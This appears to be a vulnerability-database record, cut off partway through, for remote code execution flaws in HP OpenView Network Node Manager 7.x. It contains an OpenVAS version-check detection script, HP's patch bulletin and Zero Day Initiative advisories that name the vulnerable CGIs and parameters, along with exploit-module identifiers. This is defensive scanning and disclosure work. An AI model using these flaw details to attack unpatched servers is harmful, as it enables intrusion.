HP OpenView Network Node Manager Multiple Vulnerabilities - May10
2010-06-01T00:00:00
ID OPENVAS:1361412562310900243 Type openvas Reporter Copyright (C) 2010 SecPod Modified 2019-03-01T00:00:00
Description
This host is running HP OpenView Network Node Manager and
is prone to multiple vulnerabilities.
###############################################################################
# OpenVAS Vulnerability Test
# $Id: secpod_hp_openview_nnm_mult_vuln_may10.nasl 13960 2019-03-01 13:18:27Z cfischer $
#
# HP OpenView Network Node Manager Multiple Vulnerabilities - May10
#
# Authors:
# Veerendra GG <veerendragg@secpod.com>
#
# Copyright:
# Copyright (c) 2010 SecPod, http://www.secpod.com
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
CPE = "cpe:/a:hp:openview_network_node_manager";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.900243");
script_version("$Revision: 13960 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $");
script_tag(name:"creation_date", value:"2010-06-01 15:40:11 +0200 (Tue, 01 Jun 2010)");
script_bugtraq_id(40065, 40067);
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_cve_id("CVE-2010-1550", "CVE-2010-1551", "CVE-2010-1552",
"CVE-2010-1553", "CVE-2010-1554");
script_name("HP OpenView Network Node Manager Multiple Vulnerabilities - May10");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (C) 2010 SecPod");
script_family("Web application abuses");
script_dependencies("secpod_hp_openview_nnm_detect.nasl");
script_require_ports("Services/www", 7510);
script_mandatory_keys("HP/OVNNM/installed");
script_xref(name:"URL", value:"http://marc.info/?l=bugtraq&m=127360750704351&w=2");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-081/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-082/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-083/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-084/");
script_xref(name:"URL", value:"http://zerodayinitiative.com/advisories/ZDI-10-085/");
script_xref(name:"URL", value:"http://support.openview.hp.com/selfsolve/patches");
script_tag(name:"summary", value:"This host is running HP OpenView Network Node Manager and
is prone to multiple vulnerabilities.");
script_tag(name:"insight", value:"The specific flaw exists,
- in ovet_demandpoll.exe process, which allows remote attackers to execute
arbitrary code via format string specifiers in the sel parameter.
- when _OVParseLLA function defined within ov.dll is called from netmon.exe
(Network Monitor) daemon, which directly copies the value of the 'sel' POST
variable into a fixed-length without validating the length causing stack
buffer overflow.
- within the snmpviewer.exe CGI. The doLoad function in this process calls
sprintf() with a %s format specifier without sanitizing the user supplied
data from POST variables (act and app) causing stack-based buffer overflow.
- within the getnnmdata.exe CGI. If this CGI is requested with an invalid
MaxAge parameter or invalid iCount POST parameter a sprintf() call is made
without validating the length before coping in to a fixed-length stack
buffer causing stack-based buffer overflow.");
script_tag(name:"affected", value:"HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53");
script_tag(name:"solution", value:"Upgrade to NNM v7.53 and apply the patch from the references.");
script_tag(name:"impact", value:"Successful exploitation will allow attacker to execute arbitrary code in
the context of an application.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"qod_type", value:"remote_banner_unreliable");
exit(0);
}
include("host_details.inc");
include("version_func.inc");
if( ! port = get_app_port( cpe:CPE ) ) exit( 0 );
get_app_version( cpe:CPE, port:port );
if( ! vers = get_kb_item( "www/"+ port + "/HP/OVNNM/Ver" ) ) exit( 0 );
if( version_is_equal( version:vers, test_version:"B.07.01" ) ||
version_is_equal( version:vers, test_version:"B.07.51" ) ||
version_is_equal( version:vers, test_version:"B.07.53" ) ) {
report = report_fixed_ver( installed_version:vers, fixed_version:"See references" );
security_message( port:port, data:report );
exit( 0 );
}
exit( 99 );
{"id": "OPENVAS:1361412562310900243", "type": "openvas", "bulletinFamily": "scanner", "title": "HP OpenView Network Node Manager Multiple Vulnerabilities - May10", "description": "This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.", "published": "2010-06-01T00:00:00", "modified": "2019-03-01T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900243", "reporter": "Copyright (C) 2010 SecPod", "references": ["http://zerodayinitiative.com/advisories/ZDI-10-085/", "http://marc.info/?l=bugtraq&m=127360750704351&w=2", "http://zerodayinitiative.com/advisories/ZDI-10-082/", "http://zerodayinitiative.com/advisories/ZDI-10-083/", "http://zerodayinitiative.com/advisories/ZDI-10-084/", "http://zerodayinitiative.com/advisories/ZDI-10-081/", "http://support.openview.hp.com/selfsolve/patches"], "cvelist": ["CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "lastseen": "2019-05-29T18:40:04", "viewCount": 3, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23817", "SECURITYVULNS:DOC:23820", "SECURITYVULNS:DOC:23821", "SECURITYVULNS:DOC:23822", "SECURITYVULNS:VULN:10827", "SECURITYVULNS:DOC:23819", "SECURITYVULNS:DOC:23818"]}, {"type": "cve", "idList": ["CVE-2010-1551", "CVE-2010-1550", "CVE-2010-1553", "CVE-2010-1554", "CVE-2010-1552"]}, {"type": "nessus", "idList": ["HPUX_PHSS_40705.NASL", "HPUX_PHSS_40708.NASL", "HPUX_PHSS_40707.NASL"]}, {"type": "saint", "idList": ["SAINT:E31B141E7568E9F6BD86756DDBEE0E76", "SAINT:4710FCDC0395F3FB13BA4B433FB43F99", "SAINT:E0B949A72CCB7BC89903D7F732FB87A1", "SAINT:5F3BAD5DD33554F68C6FA2D69E7F76D5", "SAINT:377F10DCAC2F7BEEC4A4AF2B0BFCBA64", "SAINT:CB238558CECE292042B771AEC6061FE4", "SAINT:34D6D846B7772CD0CF4771A13E75FC3F", "SAINT:909E1C259F91E79DDA03959C79D8A151", "SAINT:4C4E1B817EDCE1F9B13110CDFAC660A7"]}, {"type": "zdi", "idList": ["ZDI-10-081", "ZDI-10-082", "ZDI-10-085", "ZDI-10-083", "ZDI-10-084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:481659315559426EECC8DE2DE311E620", "EXPLOITPACK:11DF6F45B49D83BD88A199FB4D372A38"]}, {"type": "exploitdb", "idList": ["EDB-ID:14181", "EDB-ID:14180", "EDB-ID:17042", "EDB-ID:17039", "EDB-ID:17040"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_MAXAGE", "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_GETNNMDATA_ICOUNT", "MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMPVIEWER_ACTAPP"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:99673", "PACKETSTORM:99672", "PACKETSTORM:91442", "PACKETSTORM:91443", "PACKETSTORM:99674"]}, {"type": "seebug", "idList": ["SSV:69249", "SSV:69250"]}, {"type": "d2", "idList": ["D2SEC_HPNNM5", "D2SEC_HPNNM6"]}], "modified": "2019-05-29T18:40:04", "rev": 2}, "score": {"value": 10.2, "vector": "NONE", "modified": "2019-05-29T18:40:04", "rev": 2}, "vulnersScore": 10.2}, "pluginID": "1361412562310900243", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_hp_openview_nnm_mult_vuln_may10.nasl 13960 2019-03-01 13:18:27Z cfischer $\n#\n# HP OpenView Network Node Manager Multiple Vulnerabilities - May10\n#\n# Authors:\n# Veerendra GG <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:hp:openview_network_node_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900243\");\n script_version(\"$Revision: 13960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-01 14:18:27 +0100 (Fri, 01 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2010-06-01 15:40:11 +0200 (Tue, 01 Jun 2010)\");\n script_bugtraq_id(40065, 40067);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2010-1550\", \"CVE-2010-1551\", \"CVE-2010-1552\",\n \"CVE-2010-1553\", \"CVE-2010-1554\");\n script_name(\"HP OpenView Network Node Manager Multiple Vulnerabilities - May10\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Web application abuses\");\n script_dependencies(\"secpod_hp_openview_nnm_detect.nasl\");\n script_require_ports(\"Services/www\", 7510);\n script_mandatory_keys(\"HP/OVNNM/installed\");\n\n script_xref(name:\"URL\", value:\"http://marc.info/?l=bugtraq&m=127360750704351&w=2\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-081/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-082/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-083/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-084/\");\n script_xref(name:\"URL\", value:\"http://zerodayinitiative.com/advisories/ZDI-10-085/\");\n script_xref(name:\"URL\", value:\"http://support.openview.hp.com/selfsolve/patches\");\n\n script_tag(name:\"summary\", value:\"This host is running HP OpenView Network Node Manager and\n is prone to multiple vulnerabilities.\");\n script_tag(name:\"insight\", value:\"The specific flaw exists,\n\n - in ovet_demandpoll.exe process, which allows remote attackers to execute\n arbitrary code via format string specifiers in the sel parameter.\n\n - when _OVParseLLA function defined within ov.dll is called from netmon.exe\n (Network Monitor) daemon, which directly copies the value of the 'sel' POST\n variable into a fixed-length without validating the length causing stack\n buffer overflow.\n\n - within the snmpviewer.exe CGI. The doLoad function in this process calls\n sprintf() with a %s format specifier without sanitizing the user supplied\n data from POST variables (act and app) causing stack-based buffer overflow.\n\n - within the getnnmdata.exe CGI. If this CGI is requested with an invalid\n MaxAge parameter or invalid iCount POST parameter a sprintf() call is made\n without validating the length before coping in to a fixed-length stack\n buffer causing stack-based buffer overflow.\");\n script_tag(name:\"affected\", value:\"HP OpenView Network Node Manager (OV NNM) 7.01, 7.51, and 7.53\");\n script_tag(name:\"solution\", value:\"Upgrade to NNM v7.53 and apply the patch from the references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow attacker to execute arbitrary code in\n the context of an application.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) ) exit( 0 );\nget_app_version( cpe:CPE, port:port );\nif( ! vers = get_kb_item( \"www/\"+ port + \"/HP/OVNNM/Ver\" ) ) exit( 0 );\n\nif( version_is_equal( version:vers, test_version:\"B.07.01\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.51\" ) ||\n version_is_equal( version:vers, test_version:\"B.07.53\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"See references\" );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "naslFamily": "Web application abuses"}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c02153379\r\nVersion: 1\r\n\r\nHPSBMA02527 SSRT010098 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary\r\nCode\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2010-05-11\r\nLast Updated: 2010-05-11\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM).\r\nThese vulnerabilities could be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2010-1550 (SSRT090225, ZDI-CAN-563)\r\n\r\nCVE-2010-1551 (SSRT090226, ZDI-CAN-564)\r\n\r\nCVE-2010-1552 (SSRT090227, ZDI-CAN-566)\r\n\r\nCVE-2010-1553 (SSRT090228, ZDI-CAN-573)\r\n\r\nCVE-2010-1554 (SSRT090229, ZDI-CAN-574)\r\n\r\nCVE-2010-1555 (SSRT090230, ZDI-CAN-575)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and\r\nWindows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2010-1550 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1551 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1552 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1553 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1554 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2010-1555 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nThe Hewlett-Packard Company thanks an anonymous researcher working with the TippingPoint Zero Day\r\nInitiative for reporting these vulnerabilities to security-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOV NNM v7.53\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_40708 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_40707 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00103 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00104 or subsequent\r\n\r\nSolaris\r\n PSOV_03527 or subsequent\r\n\r\nWindows\r\n NNM_01203 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nOV NNM v7.01 (IA)\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\n\r\nOV NNM v7.01 (PA)\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.01 (PA).\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOperating_System\r\n Patch\r\n\r\nHP-UX (PA)\r\n PHSS_40705 or subsequent\r\n\r\nSolaris\r\n PSOV_03526 or subsequent\r\n\r\nWindows\r\n NNM_01202 or subsequent\r\n\r\nMANUAL ACTIONS: Yes - NonUpdate\r\nNNM v7.51 - Upgrade to v7.53 and apply the appropriate patches.\r\nNNM v7.01 (IA) - Upgrade to v7.53 and apply the appropriate patches.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX\r\nSecurity Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that\r\nmay apply to a specific HP-UX system. It can also download patches and create a depot automatically. For\r\nmore information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patches listed in the Resolution\r\n\r\nFor HP-UX OV NNM 7.01 (IA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00\r\naction: upgrade to v7.53 and apply the appropriate patches\r\n\r\nFor HP-UX OV NNM 7.01 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00\r\naction: install the patches listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2010 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP\r\nsoftware products should be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to:\r\nsecurity-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using\r\nPGP, especially exploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate\r\nsections.\r\n\r\nTo review previously published Security Bulletins visit:\r\nhttp://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is\r\ncontinually reviewing and enhancing the security features of software products to provide customers with\r\ncurrent secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the\r\naffected HP products the important security information contained in this Bulletin. HP recommends that all\r\nusers determine the applicability of this information to their individual situations and take appropriate\r\naction. HP does not warrant that this information is necessarily accurate or complete for all user\r\nsituations and, consequently, HP will not be responsible for any damages resulting from user's use or\r\ndisregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all\r\nwarranties, either express or implied, including the warranties of merchantability and fitness for a\r\nparticular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained\r\nherein. The information provided is provided "as is" without warranty of any kind. To the extent permitted\r\nby law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or\r\nconsequential damages including downtime cost; lost profits;damages relating to the procurement of\r\nsubstitute products or services; or damages for loss of data, or software restoration. The information in\r\nthis document is subject to change without notice. Hewlett-Packard Company and the names of\r\nHewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States\r\nand other countries. Other product and company names mentioned herein may be trademarks of their\r\nrespective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAkvpV7wACgkQ4B86/C0qfVnWRwCgvRTheRID0oYhLUKvEi4svTNv\r\n5ooAn0WbhqNcoK7cD/GfriarDtWYwDbz\r\n=G+bL\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23817", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23817", "title": "[security bulletin] HPSBMA02527 SSRT010098 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-1555", "CVE-2010-1552", "CVE-2010-1550", "CVE-2010-1554", "CVE-2010-1553", "CVE-2010-1551"], "description": "Vulnerabilities in multiple CGI applications.", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:VULN:10827", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10827", "title": "HP OpenView Network Node Manage multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1554"], "description": "ZDI-10-085: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-085\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1554\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9547. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the getnnmdata.exe CGI. If this CGI is\r\nrequested with an invalid iCount POST parameter a sprintf() call is made\r\nto log the error. However, no length check is performed on the variable\r\ncontents before copying in to a fixed-length stack buffer. This can be\r\nleveraged by remote attackers to execute arbitrary code under the\r\ncontext of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23822", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23822", "title": "ZDI-10-085: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1553"], "description": "ZDI-10-084: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-084\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1553\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9547. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of HP Network Node Manager. Authentication is\r\nnot required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the getnnmdata.exe CGI. If this CGI is\r\nrequested with an invalid MaxAge parameter a sprintf() call is made to\r\nlog the error. However, no length check is performed on the variable\r\ncontents before copying in to a fixed-length stack buffer. This can be\r\nleveraged by remote attackers to execute arbitrary code under the\r\ncontext of the webserver process.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379\r\n\r\n-- Disclosure Timeline:\r\n2009-10-21 - Vulnerability reported to vendor\r\n2010-05-11 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/\r\n\r\nFollow the ZDI on Twitter:\r\n\r\n http://twitter.com/thezdi", "edition": 1, "modified": "2010-05-12T00:00:00", "published": "2010-05-12T00:00:00", "id": "SECURITYVULNS:DOC:23821", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23821", "title": "ZDI-10-084: HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:34", "bulletinFamily": "software", "cvelist": ["CVE-2010-1550"], "description": "ZDI-10-081: HP OpenView NNM ovet_demandpoll sel CGI Variable Format String Remote Code Execution\r\nVulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-10-081\r\nMay 11, 2010\r\n\r\n-- CVE ID:\r\nCVE-2010-1550\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 9273. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n 